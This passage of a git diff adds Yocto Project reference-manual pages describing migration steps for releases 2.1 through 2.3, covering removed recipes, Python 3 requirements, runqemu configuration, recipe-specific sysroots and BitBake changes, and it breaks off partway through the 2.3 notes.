+ section in the Toaster User Manual for more information on this
+ interface.
+
+- *"puccho" BitBake UI*: Removed because is unmaintained and no longer
+ useful.
+
+.. _migration-2.1-adt-removed:
+
+ADT Removed
+-----------
+
+The Application Development Toolkit (ADT) has been removed because its
+functionality almost completely overlapped with the :ref:`standard
+SDK <sdk-manual/sdk-using:using the standard sdk>` and the
+:ref:`extensible SDK <sdk-manual/sdk-extensible:using the extensible sdk>`. For
+information on these SDKs and how to build and use them, see the
+:doc:`../sdk-manual/sdk-manual` manual.
+
+.. note::
+
+ The Yocto Project Eclipse IDE Plug-in is still supported and is not
+ affected by this change.
+
+.. _migration-2.1-poky-reference-distribution-changes:
+
+Poky Reference Distribution Changes
+-----------------------------------
+
+The following changes have been made for the Poky distribution:
+
+- The ``meta-yocto`` layer has been renamed to ``meta-poky`` to better
+ match its purpose, which is to provide the Poky reference
+ distribution. The ``meta-yocto-bsp`` layer retains its original name
+ since it provides reference machines for the Yocto Project and it is
+ otherwise unrelated to Poky. References to ``meta-yocto`` in your
+ ``conf/bblayers.conf`` should automatically be updated, so you should
+ not need to change anything unless you are relying on this naming
+ elsewhere.
+
+- The :ref:`uninative <ref-classes-uninative>` class is now enabled
+ by default in Poky. This class attempts to isolate the build system
+ from the host distribution's C library and makes re-use of native
+ shared state artifacts across different host distributions practical.
+ With this class enabled, a tarball containing a pre-built C library
+ is downloaded at the start of the build.
+
+ The ``uninative`` class is enabled through the
+ ``meta/conf/distro/include/yocto-uninative.inc`` file, which for
+ those not using the Poky distribution, can include to easily enable
+ the same functionality.
+
+ Alternatively, if you wish to build your own ``uninative`` tarball,
+ you can do so by building the ``uninative-tarball`` recipe, making it
+ available to your build machines (e.g. over HTTP/HTTPS) and setting a
+ similar configuration as the one set by ``yocto-uninative.inc``.
+
+- Static library generation, for most cases, is now disabled by default
+ in the Poky distribution. Disabling this generation saves some build
+ time as well as the size used for build output artifacts.
+
+ Disabling this library generation is accomplished through a
+ ``meta/conf/distro/include/no-static-libs.inc``, which for those not
+ using the Poky distribution can easily include to enable the same
+ functionality.
+
+ Any recipe that needs to opt-out of having the "--disable-static"
+ option specified on the configure command line either because it is
+ not a supported option for the configure script or because static
+ libraries are needed should set the following variable:
+ ::
+
+ DISABLE_STATIC = ""
+
+- The separate ``poky-tiny`` distribution now uses the musl C library
+ instead of a heavily pared down ``glibc``. Using musl results in a
+ smaller distribution and facilitates much greater maintainability
+ because musl is designed to have a small footprint.
+
+ If you have used ``poky-tiny`` and have customized the ``glibc``
+ configuration you will need to redo those customizations with musl
+ when upgrading to the new release.
+
+.. _migration-2.1-packaging-changes:
+
+Packaging Changes
+-----------------
+
+The following changes have been made to packaging:
+
+- The ``runuser`` and ``mountpoint`` binaries, which were previously in
+ the main ``util-linux`` package, have been split out into the
+ ``util-linux-runuser`` and ``util-linux-mountpoint`` packages,
+ respectively.
+
+- The ``python-elementtree`` package has been merged into the
+ ``python-xml`` package.
+
+.. _migration-2.1-tuning-file-changes:
+
+Tuning File Changes
+-------------------
+
+The following changes have been made to the tuning files:
+
+- The "no-thumb-interwork" tuning feature has been dropped from the ARM
+ tune include files. Because interworking is required for ARM EABI,
+ attempting to disable it through a tuning feature no longer makes
+ sense.
+
+ .. note::
+
+ Support for ARM OABI was deprecated in gcc 4.7.
+
+- The ``tune-cortexm*.inc`` and ``tune-cortexr4.inc`` files have been
+ removed because they are poorly tested. Until the OpenEmbedded build
+ system officially gains support for CPUs without an MMU, these tuning
+ files would probably be better maintained in a separate layer if
+ needed.
+
+.. _migration-2.1-supporting-gobject-introspection:
+
+Supporting GObject Introspection
+--------------------------------
+
+This release supports generation of GLib Introspective Repository (GIR)
+files through GObject introspection, which is the standard mechanism for
+accessing GObject-based software from runtime environments. You can
+enable, disable, and test the generation of this data. See the
+":ref:`dev-manual/dev-manual-common-tasks:enabling gobject introspection support`"
+section in the Yocto Project Development Tasks Manual for more
+information.
+
+.. _migration-2.1-miscellaneous-changes:
+
+Miscellaneous Changes
+---------------------
+
+These additional changes exist:
+
+- The minimum Git version has been increased to 1.8.3.1. If your host
+ distribution does not provide a sufficiently recent version, you can
+ install the buildtools, which will provide it. See the
+ :ref:`ref-manual/ref-system-requirements:required git, tar, python and gcc versions`
+ section for more information on the buildtools tarball.
+
+- The buggy and incomplete support for the RPM version 4 package
+ manager has been removed. The well-tested and maintained support for
+ RPM version 5 remains.
+
+- Previously, the following list of packages were removed if
+ package-management was not in
+ :term:`IMAGE_FEATURES`, regardless of any
+ dependencies:
+ ::
+
+ update-rc.d
+ base-passwd
+ shadow
+ update-alternatives
+ run-postinsts
+
+ With the Yocto Project 2.1 release, these packages are
+ only removed if "read-only-rootfs" is in ``IMAGE_FEATURES``, since
+ they might still be needed for a read-write image even in the absence
+ of a package manager (e.g. if users need to be added, modified, or
+ removed at runtime).
+
+- The
+ :ref:`devtool modify <sdk-manual/sdk-extensible:use \`\`devtool modify\`\` to modify the source of an existing component>`
+ command now defaults to extracting the source since that is most
+ commonly expected. The "-x" or "--extract" options are now no-ops. If
+ you wish to provide your own existing source tree, you will now need
+ to specify either the "-n" or "--no-extract" options when running
+ ``devtool modify``.
+
+- If the formfactor for a machine is either not supplied or does not
+ specify whether a keyboard is attached, then the default is to assume
+ a keyboard is attached rather than assume no keyboard. This change
+ primarily affects the Sato UI.
+
+- The ``.debug`` directory packaging is now automatic. If your recipe
+ builds software that installs binaries into directories other than
+ the standard ones, you no longer need to take care of setting
+ ``FILES_${PN}-dbg`` to pick up the resulting ``.debug`` directories
+ as these directories are automatically found and added.
+
+- Inaccurate disk and CPU percentage data has been dropped from
+ ``buildstats`` output. This data has been replaced with
+ ``getrusage()`` data and corrected IO statistics. You will probably
+ need to update any custom code that reads the ``buildstats`` data.
+
+- The ``meta/conf/distro/include/package_regex.inc`` is now deprecated.
+ The contents of this file have been moved to individual recipes.
+
+ .. note::
+
+ Because this file will likely be removed in a future Yocto Project
+ release, it is suggested that you remove any references to the
+ file that might be in your configuration.
+
+- The ``v86d/uvesafb`` has been removed from the ``genericx86`` and
+ ``genericx86-64`` reference machines, which are provided by the
+ ``meta-yocto-bsp`` layer. Most modern x86 boards do not rely on this
+ file and it only adds kernel error messages during startup. If you do
+ still need to support ``uvesafb``, you can simply add ``v86d`` to
+ your image.
+
+- Build sysroot paths are now removed from debug symbol files. Removing
+ these paths means that remote GDB using an unstripped build system
+ sysroot will no longer work (although this was never documented to
+ work). The supported method to accomplish something similar is to set
+ ``IMAGE_GEN_DEBUGFS`` to "1", which will generate a companion debug
+ image containing unstripped binaries and associated debug sources
+ alongside the image.
+
+
diff --git a/documentation/ref-manual/migration-2.2.rst b/documentation/ref-manual/migration-2.2.rst
new file mode 100644
index 0000000000..8afa8ffdda
--- /dev/null
+++ b/documentation/ref-manual/migration-2.2.rst
@@ -0,0 +1,450 @@
+Moving to the Yocto Project 2.2 Release
+=======================================
+
+This section provides migration information for moving to the Yocto
+Project 2.2 Release from the prior release.
+
+.. _migration-2.2-minimum-kernel-version:
+
+Minimum Kernel Version
+----------------------
+
+The minimum kernel version for the target system and for SDK is now
+3.2.0, due to the upgrade to ``glibc 2.24``. Specifically, for
+AArch64-based targets the version is 3.14. For Nios II-based targets,
+the minimum kernel version is 3.19.
+
+.. note::
+
+ For x86 and x86_64, you can reset :term:`OLDEST_KERNEL`
+ to anything down to 2.6.32 if desired.
+
+.. _migration-2.2-staging-directories-in-sysroot-simplified:
+
+Staging Directories in Sysroot Has Been Simplified
+--------------------------------------------------
+
+The way directories are staged in sysroot has been simplified and
+introduces the new :term:`SYSROOT_DIRS`,
+:term:`SYSROOT_DIRS_NATIVE`, and
+:term:`SYSROOT_DIRS_BLACKLIST`. See the
+`v2 patch series on the OE-Core Mailing
+List <http://lists.openembedded.org/pipermail/openembedded-core/2016-May/121365.html>`__
+for additional information.
+
+.. _migration-2.2-removal-of-old-images-from-tmp-deploy-now-enabled:
+
+Removal of Old Images and Other Files in ``tmp/deploy`` Now Enabled
+-------------------------------------------------------------------
+
+Removal of old images and other files in ``tmp/deploy/`` is now enabled
+by default due to a new staging method used for those files. As a result
+of this change, the ``RM_OLD_IMAGE`` variable is now redundant.
+
+.. _migration-2.2-python-changes:
+
+Python Changes
+--------------
+
+The following changes for Python occurred:
+
+.. _migration-2.2-bitbake-now-requires-python-3.4:
+
+BitBake Now Requires Python 3.4+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+BitBake requires Python 3.4 or greater.
+
+.. _migration-2.2-utf-8-locale-required-on-build-host:
+
+UTF-8 Locale Required on Build Host
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+A UTF-8 locale is required on the build host due to Python 3. Since
+C.UTF-8 is not a standard, the default is en_US.UTF-8.
+
+.. _migration-2.2-metadata-now-must-use-python-3-syntax:
+
+Metadata Must Now Use Python 3 Syntax
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+The metadata is now required to use Python 3 syntax. For help preparing
+metadata, see any of the many Python 3 porting guides available.
+Alternatively, you can reference the conversion commits for Bitbake and
+you can use :term:`OpenEmbedded-Core (OE-Core)` as a guide for changes. Following are
+particular areas of interest:
+
+ - subprocess command-line pipes needing locale decoding
+
+ - the syntax for octal values changed
+
+ - the ``iter*()`` functions changed name
+
+ - iterators now return views, not lists
+
+ - changed names for Python modules
+
+.. _migration-2.2-target-python-recipes-switched-to-python-3:
+
+Target Python Recipes Switched to Python 3
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Most target Python recipes have now been switched to Python 3.
+Unfortunately, systems using RPM as a package manager and providing
+online package-manager support through SMART still require Python 2.
+
+.. note::
+
+ Python 2 and recipes that use it can still be built for the target as
+ with previous versions.
+
+.. _migration-2.2-buildtools-tarball-includes-python-3:
+
+``buildtools-tarball`` Includes Python 3
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+``buildtools-tarball`` now includes Python 3.
+
+.. _migration-2.2-uclibc-replaced-by-musl:
+
+uClibc Replaced by musl
+-----------------------
+
+uClibc has been removed in favor of musl. Musl has matured, is better
+maintained, and is compatible with a wider range of applications as
+compared to uClibc.
+
+.. _migration-2.2-B-no-longer-default-working-directory-for-tasks:
+
+``${B}`` No Longer Default Working Directory for Tasks
+------------------------------------------------------
+
+``${``\ :term:`B`\ ``}`` is no longer the default working
+directory for tasks. Consequently, any custom tasks you define now need
+to either have the
+``[``\ :ref:`dirs <bitbake:bitbake-user-manual/bitbake-user-manual-metadata:variable flags>`\ ``]`` flag
+set, or the task needs to change into the appropriate working directory
+manually (e.g using ``cd`` for a shell task).
+
+.. note::
+
+ The preferred method is to use the
+ [dirs]
+ flag.
+
+.. _migration-2.2-runqemu-ported-to-python:
+
+``runqemu`` Ported to Python
+----------------------------
+
+``runqemu`` has been ported to Python and has changed behavior in some
+cases. Previous usage patterns continue to be supported.
+
+The new ``runqemu`` is a Python script. Machine knowledge is no longer
+hardcoded into ``runqemu``. You can choose to use the ``qemuboot``
+configuration file to define the BSP's own arguments and to make it
+bootable with ``runqemu``. If you use a configuration file, use the
+following form:
+::
+
+ image-name-machine.qemuboot.conf
+
+The configuration file
+enables fine-grained tuning of options passed to QEMU without the
+``runqemu`` script hard-coding any knowledge about different machines.
+Using a configuration file is particularly convenient when trying to use
+QEMU with machines other than the ``qemu*`` machines in
+:term:`OpenEmbedded-Core (OE-Core)`. The ``qemuboot.conf`` file is generated by the
+``qemuboot`` class when the root filesystem is being build (i.e. build
+rootfs). QEMU boot arguments can be set in BSP's configuration file and
+the ``qemuboot`` class will save them to ``qemuboot.conf``.
+
+If you want to use ``runqemu`` without a configuration file, use the
+following command form:
+::
+
+ $ runqemu machine rootfs kernel [options]
+
+Supported machines are as follows:
+
+ - qemuarm
+ - qemuarm64
+ - qemux86
+ - qemux86-64
+ - qemuppc
+ - qemumips
+ - qemumips64
+ - qemumipsel
+ - qemumips64el
+
+Consider the
+following example, which uses the ``qemux86-64`` machine, provides a
+root filesystem, provides an image, and uses the ``nographic`` option: ::
+
+ $ runqemu qemux86-64 tmp/deploy/images/qemux86-64/core-image-minimal-qemux86-64.ext4 tmp/deploy/images/qemux86-64/bzImage nographic
+
+Following is a list of variables that can be set in configuration files
+such as ``bsp.conf`` to enable the BSP to be booted by ``runqemu``:
+
+.. note::
+
+ "QB" means "QEMU Boot".
+
+::
+
+ QB_SYSTEM_NAME: QEMU name (e.g. "qemu-system-i386")
+ QB_OPT_APPEND: Options to append to QEMU (e.g. "-show-cursor")
+ QB_DEFAULT_KERNEL: Default kernel to boot (e.g. "bzImage")
+ QB_DEFAULT_FSTYPE: Default FSTYPE to boot (e.g. "ext4")
+ QB_MEM: Memory (e.g. "-m 512")
+ QB_MACHINE: QEMU machine (e.g. "-machine virt")
+ QB_CPU: QEMU cpu (e.g. "-cpu qemu32")
+ QB_CPU_KVM: Similar to QB_CPU except used for kvm support (e.g. "-cpu kvm64")
+ QB_KERNEL_CMDLINE_APPEND: Options to append to the kernel's -append
+ option (e.g. "console=ttyS0 console=tty")
+ QB_DTB: QEMU dtb name
+ QB_AUDIO_DRV: QEMU audio driver (e.g. "alsa", set it when support audio)
+ QB_AUDIO_OPT: QEMU audio option (e.g. "-soundhw ac97,es1370"), which is used
+ when QB_AUDIO_DRV is set.
+ QB_KERNEL_ROOT: Kernel's root (e.g. /dev/vda)
+ QB_TAP_OPT: Network option for 'tap' mode (e.g.
+ "-netdev tap,id=net0,ifname=@TAP@,script=no,downscript=no -device virtio-net-device,netdev=net0").
+ runqemu will replace "@TAP@" with the one that is used, such as tap0, tap1 ...
+ QB_SLIRP_OPT: Network option for SLIRP mode (e.g. "-netdev user,id=net0 -device virtio-net-device,netdev=net0")
+ QB_ROOTFS_OPT: Used as rootfs (e.g.
+ "-drive id=disk0,file=@ROOTFS@,if=none,format=raw -device virtio-blk-device,drive=disk0").
+ runqemu will replace "@ROOTFS@" with the one which is used, such as
+ core-image-minimal-qemuarm64.ext4.
+ QB_SERIAL_OPT: Serial port (e.g. "-serial mon:stdio")
+ QB_TCPSERIAL_OPT: tcp serial port option (e.g.
+ " -device virtio-serial-device -chardev socket,id=virtcon,port=@PORT@,host=127.0.0.1 -device virtconsole,chardev=virtcon"
+ runqemu will replace "@PORT@" with the port number which is used.
+
+To use ``runqemu``, set :term:`IMAGE_CLASSES` as
+follows and run ``runqemu``:
+
+.. note::
+
+ For command-line syntax, use ``runqemu help``.
+
+::
+
+ IMAGE_CLASSES += "qemuboot"
+
+.. _migration-2.2-default-linker-hash-style-changed:
+
+Default Linker Hash Style Changed
+---------------------------------
+
+The default linker hash style for ``gcc-cross`` is now "sysv" in order
+to catch recipes that are building software without using the
+OpenEmbedded :term:`LDFLAGS`. This change could result in
+seeing some "No GNU_HASH in the elf binary" QA issues when building such
+recipes. You need to fix these recipes so that they use the expected
+``LDFLAGS``. Depending on how the software is built, the build system
+used by the software (e.g. a Makefile) might need to be patched.
+However, sometimes making this fix is as simple as adding the following
+to the recipe:
+::
+
+ TARGET_CC_ARCH += "${LDFLAGS}"
+
+.. _migration-2.2-kernel-image-base-name-no-longer-uses-kernel-imagetype:
+
+``KERNEL_IMAGE_BASE_NAME`` no Longer Uses ``KERNEL_IMAGETYPE``
+--------------------------------------------------------------
+
+The ``KERNEL_IMAGE_BASE_NAME`` variable no longer uses the
+:term:`KERNEL_IMAGETYPE` variable to create the
+image's base name. Because the OpenEmbedded build system can now build
+multiple kernel image types, this part of the kernel image base name as
+been removed leaving only the following:
+::
+
+ KERNEL_IMAGE_BASE_NAME ?= "${PKGE}-${PKGV}-${PKGR}-${MACHINE}-${DATETIME}"
+
+If you have recipes or
+classes that use ``KERNEL_IMAGE_BASE_NAME`` directly, you might need to
+update the references to ensure they continue to work.
+
+.. _migration-2.2-bitbake-changes:
+
+BitBake Changes
+---------------
+
+The following changes took place for BitBake:
+
+- The "goggle" UI and standalone image-writer tool have been removed as
+ they both require GTK+ 2.0 and were not being maintained.
+
+- The Perforce fetcher now supports :term:`SRCREV` for
+ specifying the source revision to use, be it
+ ``${``\ :term:`AUTOREV`\ ``}``, changelist number,
+ p4date, or label, in preference to separate
+ :term:`SRC_URI` parameters to specify these. This
+ change is more in-line with how the other fetchers work for source
+ control systems. Recipes that fetch from Perforce will need to be
+ updated to use ``SRCREV`` in place of specifying the source revision
+ within ``SRC_URI``.
+
+- Some of BitBake's internal code structures for accessing the recipe
+ cache needed to be changed to support the new multi-configuration
+ functionality. These changes will affect external tools that use
+ BitBake's tinfoil module. For information on these changes, see the
+ changes made to the scripts supplied with OpenEmbedded-Core:
+ `1 <http://git.yoctoproject.org/cgit/cgit.cgi/poky/commit/?id=189371f8393971d00bca0fceffd67cc07784f6ee>`__
+ and
+ `2 <http://git.yoctoproject.org/cgit/cgit.cgi/poky/commit/?id=4a5aa7ea4d07c2c90a1654b174873abb018acc67>`__.
+
+- The task management code has been rewritten to avoid using ID
+ indirection in order to improve performance. This change is unlikely
+ to cause any problems for most users. However, the setscene
+ verification function as pointed to by
+ ``BB_SETSCENE_VERIFY_FUNCTION`` needed to change signature.
+ Consequently, a new variable named ``BB_SETSCENE_VERIFY_FUNCTION2``
+ has been added allowing multiple versions of BitBake to work with
+ suitably written metadata, which includes OpenEmbedded-Core and Poky.
+ Anyone with custom BitBake task scheduler code might also need to
+ update the code to handle the new structure.
+
+.. _migration-2.2-swabber-has-been-removed:
+
+Swabber has Been Removed
+------------------------
+
+Swabber, a tool that was intended to detect host contamination in the
+build process, has been removed, as it has been unmaintained and unused
+for some time and was never particularly effective. The OpenEmbedded
+build system has since incorporated a number of mechanisms including
+enhanced QA checks that mean that there is less of a need for such a
+tool.
+
+.. _migration-2.2-removed-recipes:
+
+Removed Recipes
+---------------
+
+The following recipes have been removed:
+
+- ``augeas``: No longer needed and has been moved to ``meta-oe``.
+
+- ``directfb``: Unmaintained and has been moved to ``meta-oe``.
+
+- ``gcc``: Removed 4.9 version. Versions 5.4 and 6.2 are still present.
+
+- ``gnome-doc-utils``: No longer needed.
+
+- ``gtk-doc-stub``: Replaced by ``gtk-doc``.
+
+- ``gtk-engines``: No longer needed and has been moved to
+ ``meta-gnome``.
+
+- ``gtk-sato-engine``: Became obsolete.
+
+- ``libglade``: No longer needed and has been moved to ``meta-oe``.
+
+- ``libmad``: Unmaintained and functionally replaced by ``libmpg123``.
+ ``libmad`` has been moved to ``meta-oe``.
+
+- ``libowl``: Became obsolete.
+
+- ``libxsettings-client``: No longer needed.
+
+- ``oh-puzzles``: Functionally replaced by ``puzzles``.
+
+- ``oprofileui``: Became obsolete. OProfile has been largely supplanted
+ by perf.
+
+- ``packagegroup-core-directfb.bb``: Removed.
+
+- ``core-image-directfb.bb``: Removed.
+
+- ``pointercal``: No longer needed and has been moved to ``meta-oe``.
+
+- ``python-imaging``: No longer needed and moved to ``meta-python``
+
+- ``python-pyrex``: No longer needed and moved to ``meta-python``.
+
+- ``sato-icon-theme``: Became obsolete.
+
+- ``swabber-native``: Swabber has been removed. See the `entry on
+ Swabber <#swabber-has-been-removed>`__.
+
+- ``tslib``: No longer needed and has been moved to ``meta-oe``.
+
+- ``uclibc``: Removed in favor of musl.
+
+- ``xtscal``: No longer needed and moved to ``meta-oe``
+
+.. _migration-2.2-removed-classes:
+
+Removed Classes
+---------------
+
+The following classes have been removed:
+
+- ``distutils-native-base``: No longer needed.
+
+- ``distutils3-native-base``: No longer needed.
+
+- ``sdl``: Only set :term:`DEPENDS` and
+ :term:`SECTION`, which are better set within the
+ recipe instead.
+
+- ``sip``: Mostly unused.
+
+- ``swabber``: See the `entry on
+ Swabber <#swabber-has-been-removed>`__.
+
+.. _migration-2.2-minor-packaging-changes:
+
+Minor Packaging Changes
+-----------------------
+
+The following minor packaging changes have occurred:
+
+- ``grub``: Split ``grub-editenv`` into its own package.
+
+- ``systemd``: Split container and vm related units into a new package,
+ systemd-container.
+
+- ``util-linux``: Moved ``prlimit`` to a separate
+ ``util-linux-prlimit`` package.
+
+.. _migration-2.2-miscellaneous-changes:
+
+Miscellaneous Changes
+---------------------
+
+The following miscellaneous changes have occurred:
+
+- ``package_regex.inc``: Removed because the definitions
+ ``package_regex.inc`` previously contained have been moved to their
+ respective recipes.
+
+- Both ``devtool add`` and ``recipetool create`` now use a fixed
+ :term:`SRCREV` by default when fetching from a Git
+ repository. You can override this in either case to use
+ ``${``\ :term:`AUTOREV`\ ``}`` instead by using the
+ ``-a`` or ``DASHDASHautorev`` command-line option
+
+- ``distcc``: GTK+ UI is now disabled by default.
+
+- ``packagegroup-core-tools-testapps``: Removed Piglit.
+
+- ``image.bbclass``: Renamed COMPRESS(ION) to CONVERSION. This change
+ means that ``COMPRESSIONTYPES``, ``COMPRESS_DEPENDS`` and
+ ``COMPRESS_CMD`` are deprecated in favor of ``CONVERSIONTYPES``,
+ ``CONVERSION_DEPENDS`` and ``CONVERSION_CMD``. The ``COMPRESS*``
+ variable names will still work in the 2.2 release but metadata that
+ does not need to be backwards-compatible should be changed to use the
+ new names as the ``COMPRESS*`` ones will be removed in a future
+ release.
+
+- ``gtk-doc``: A full version of ``gtk-doc`` is now made available.
+ However, some old software might not be capable of using the current
+ version of ``gtk-doc`` to build documentation. You need to change
+ recipes that build such software so that they explicitly disable
+ building documentation with ``gtk-doc``.
+
+
diff --git a/documentation/ref-manual/migration-2.3.rst b/documentation/ref-manual/migration-2.3.rst
new file mode 100644
index 0000000000..5bf3e7033c
--- /dev/null
+++ b/documentation/ref-manual/migration-2.3.rst
@@ -0,0 +1,523 @@
+Moving to the Yocto Project 2.3 Release
+=======================================
+
+This section provides migration information for moving to the Yocto
+Project 2.3 Release from the prior release.
+
+.. _migration-2.3-recipe-specific-sysroots:
+
+Recipe-specific Sysroots
+------------------------
+
+The OpenEmbedded build system now uses one sysroot per recipe to resolve
+long-standing issues with configuration script auto-detection of
+undeclared dependencies. Consequently, you might find that some of your
+previously written custom recipes are missing declared dependencies,
+particularly those dependencies that are incidentally built earlier in a
+typical build process and thus are already likely to be present in the
+shared sysroot in previous releases.
+
+Consider the following:
+
+- *Declare Build-Time Dependencies:* Because of this new feature, you
+ must explicitly declare all build-time dependencies for your recipe.
+ If you do not declare these dependencies, they are not populated into
+ the sysroot for the recipe.
+
+- *Specify Pre-Installation and Post-Installation Native Tool
+ Dependencies:* You must specifically specify any special native tool
+ dependencies of ``pkg_preinst`` and ``pkg_postinst`` scripts by using
+ the :term:`PACKAGE_WRITE_DEPS` variable.
+ Specifying these dependencies ensures that these tools are available
+ if these scripts need to be run on the build host during the
+ :ref:`ref-tasks-rootfs` task.
+
+ As an example, see the ``dbus`` recipe. You will see that this recipe
+ has a ``pkg_postinst`` that calls ``systemctl`` if "systemd" is in
+ :term:`DISTRO_FEATURES`. In the example,
+ ``systemd-systemctl-native`` is added to ``PACKAGE_WRITE_DEPS``,
+ which is also conditional on "systemd" being in ``DISTRO_FEATURES``.
+
+- Examine Recipes that Use ``SSTATEPOSTINSTFUNCS``: You need to
+ examine any recipe that uses ``SSTATEPOSTINSTFUNCS`` and determine
+ steps to take.
+
+ Functions added to ``SSTATEPOSTINSTFUNCS`` are still called as they
+ were in previous Yocto Project releases. However, since a separate
+ sysroot is now being populated for every recipe and if existing
+ functions being called through ``SSTATEPOSTINSTFUNCS`` are doing
+ relocation, then you will need to change these to use a
+ post-installation script that is installed by a function added to
+ :term:`SYSROOT_PREPROCESS_FUNCS`.
+
+ For an example, see the ``pixbufcache`` class in ``meta/classes/`` in
+ the :ref:`overview-manual/overview-manual-development-environment:yocto project source repositories`.
+
+ .. note::
+
+ The
+ SSTATEPOSTINSTFUNCS
+ variable itself is now deprecated in favor of the
+ do_populate_sysroot[postfuncs]
+ task. Consequently, if you do still have any function or functions
+ that need to be called after the sysroot component is created for
+ a recipe, then you would be well advised to take steps to use a
+ post installation script as described previously. Taking these
+ steps prepares your code for when
+ SSTATEPOSTINSTFUNCS
+ is removed in a future Yocto Project release.
+
+- *Specify the Sysroot when Using Certain External Scripts:* Because
+ the shared sysroot is now gone, the scripts
+ ``oe-find-native-sysroot`` and ``oe-run-native`` have been changed
+ such that you need to specify which recipe's
+ :term:`STAGING_DIR_NATIVE` is used.
+
+.. note::
+
+ You can find more information on how recipe-specific sysroots work in
+ the ":ref:`ref-classes-staging`" section.
+
+.. _migration-2.3-path-variable:
+
+``PATH`` Variable
+-----------------
+
+Within the environment used to run build tasks, the environment variable
+``PATH`` is now sanitized such that the normal native binary paths
+(``/bin``, ``/sbin``, ``/usr/bin`` and so forth) are removed and a
+directory containing symbolic links linking only to the binaries from
+the host mentioned in the :term:`HOSTTOOLS` and
+:term:`HOSTTOOLS_NONFATAL` variables is added
+to ``PATH``.
+
+Consequently, any native binaries provided by the host that you need to
+call needs to be in one of these two variables at the configuration
+level.
+
+Alternatively, you can add a native recipe (i.e. ``-native``) that
+provides the binary to the recipe's :term:`DEPENDS`
+value.
+
+.. note::
+
+ PATH
+ is not sanitized in the same way within ``devshell``.
+ If it were, you would have difficulty running host tools for
+ development and debugging within the shell.
+
+.. _migration-2.3-scripts:
+
+Changes to Scripts
+------------------
+
+The following changes to scripts took place:
+
+- ``oe-find-native-sysroot``: The usage for the
+ ``oe-find-native-sysroot`` script has changed to the following:
+ ::
+
+ $ . oe-find-native-sysroot recipe
+
+ You must now supply a recipe for recipe
+ as part of the command. Prior to the Yocto Project 2.3 release, it
+ was not necessary to provide the script with the command.
+
+- ``oe-run-native``: The usage for the ``oe-run-native`` script has
+ changed to the following:
+ ::
+
+ $ oe-run-native native_recipe tool
+
+ You must
+ supply the name of the native recipe and the tool you want to run as
+ part of the command. Prior to the Yocto Project 2.3 release, it
+ was not necessary to provide the native recipe with the command.
+
+- ``cleanup-workdir``: The ``cleanup-workdir`` script has been
+ removed because the script was found to be deleting files it should
+ not have, which lead to broken build trees. Rather than trying to
+ delete portions of :term:`TMPDIR` and getting it wrong,
+ it is recommended that you delete ``TMPDIR`` and have it restored
+ from shared state (sstate) on subsequent builds.
+
+- ``wipe-sysroot``: The ``wipe-sysroot`` script has been removed as
+ it is no longer needed with recipe-specific sysroots.
+
+.. _migration-2.3-functions:
+
+Changes to Functions
+--------------------
+
+The previously deprecated ``bb.data.getVar()``, ``bb.data.setVar()``,
+and related functions have been removed in favor of ``d.getVar()``,
+``d.setVar()``, and so forth.
+
+You need to fix any references to these old functions.
+
+.. _migration-2.3-bitbake-changes:
+
+BitBake Changes
+---------------
+
+The following changes took place for BitBake:
+
+- *BitBake's Graphical Dependency Explorer UI Replaced:* BitBake's
+ graphical dependency explorer UI ``depexp`` was replaced by
+ ``taskexp`` ("Task Explorer"), which provides a graphical way of
+ exploring the ``task-depends.dot`` file. The data presented by Task
+ Explorer is much more accurate than the data that was presented by
+ ``depexp``. Being able to visualize the data is an often requested
+ feature as standard ``*.dot`` file viewers cannot usual cope with the
+ size of the ``task-depends.dot`` file.
+
+- *BitBake "-g" Output Changes:* The ``package-depends.dot`` and
+ ``pn-depends.dot`` files as previously generated using the
+ ``bitbake -g`` command have been removed. A ``recipe-depends.dot``
+ file is now generated as a collapsed version of ``task-depends.dot``
+ instead.
+
+ The reason for this change is because ``package-depends.dot`` and
+ ``pn-depends.dot`` largely date back to a time before task-based
+ execution and do not take into account task-level dependencies
+ between recipes, which could be misleading.
+
+- *Mirror Variable Splitting Changes:* Mirror variables including
+ :term:`MIRRORS`, :term:`PREMIRRORS`,
+ and :term:`SSTATE_MIRRORS` can now separate
+ values entirely with spaces. Consequently, you no longer need "\\n".
+ BitBake looks for pairs of values, which simplifies usage. There
+ should be no change required to existing mirror variable values
+ themselves.
+
+- *The Subversion (SVN) Fetcher Uses an "ssh" Parameter and Not an
+ "rsh" Parameter:* The SVN fetcher now takes an "ssh" parameter
+ instead of an "rsh" parameter. This new optional parameter is used
+ when the "protocol" parameter is set to "svn+ssh". You can only use
+ the new parameter to specify the ``ssh`` program used by SVN. The SVN
+ fetcher passes the new parameter through the ``SVN_SSH`` environment
+ variable during the :ref:`ref-tasks-fetch` task.
+
+ See the ":ref:`bitbake:svn-fetcher`"
+ section in the BitBake
+ User Manual for additional information.
+
+- ``BB_SETSCENE_VERIFY_FUNCTION`` and ``BB_SETSCENE_VERIFY_FUNCTION2``
+ Removed: Because the mechanism they were part of is no longer
+ necessary with recipe-specific sysroots, the
+ ``BB_SETSCENE_VERIFY_FUNCTION`` and ``BB_SETSCENE_VERIFY_FUNCTION2``
+ variables have been removed.
+
+.. _migration-2.3-absolute-symlinks:
+
+Absolute Symbolic Links
+-----------------------
+
+Absolute symbolic links (symlinks) within staged files are no longer
+permitted and now trigger an error. Any explicit creation of symlinks
+can use the ``lnr`` script, which is a replacement for ``ln -r``.
+
+If the build scripts in the software that the recipe is building are
+creating a number of absolute symlinks that need to be corrected, you
+can inherit ``relative_symlinks`` within the recipe to turn those
+absolute symlinks into relative symlinks.
+
+.. _migration-2.3-gplv2-and-gplv3-moves:
+
+GPLv2 Versions of GPLv3 Recipes Moved
+-------------------------------------
+
+Older GPLv2 versions of GPLv3 recipes have moved to a separate
+``meta-gplv2`` layer.
+
+If you use :term:`INCOMPATIBLE_LICENSE` to
+exclude GPLv3 or set :term:`PREFERRED_VERSION`
+to substitute a GPLv2 version of a GPLv3 recipe, then you must add the
+``meta-gplv2`` layer to your configuration.
+
+.. note::
+
+ You can ``find meta-gplv2`` layer in the OpenEmbedded layer index at
+ https://layers.openembedded.org/layerindex/branch/master/layer/meta-gplv2/.
+
+These relocated GPLv2 recipes do not receive the same level of
+maintenance as other core recipes. The recipes do not get security fixes
+and upstream no longer maintains them. In fact, the upstream community
+is actively hostile towards people that use the old versions of the
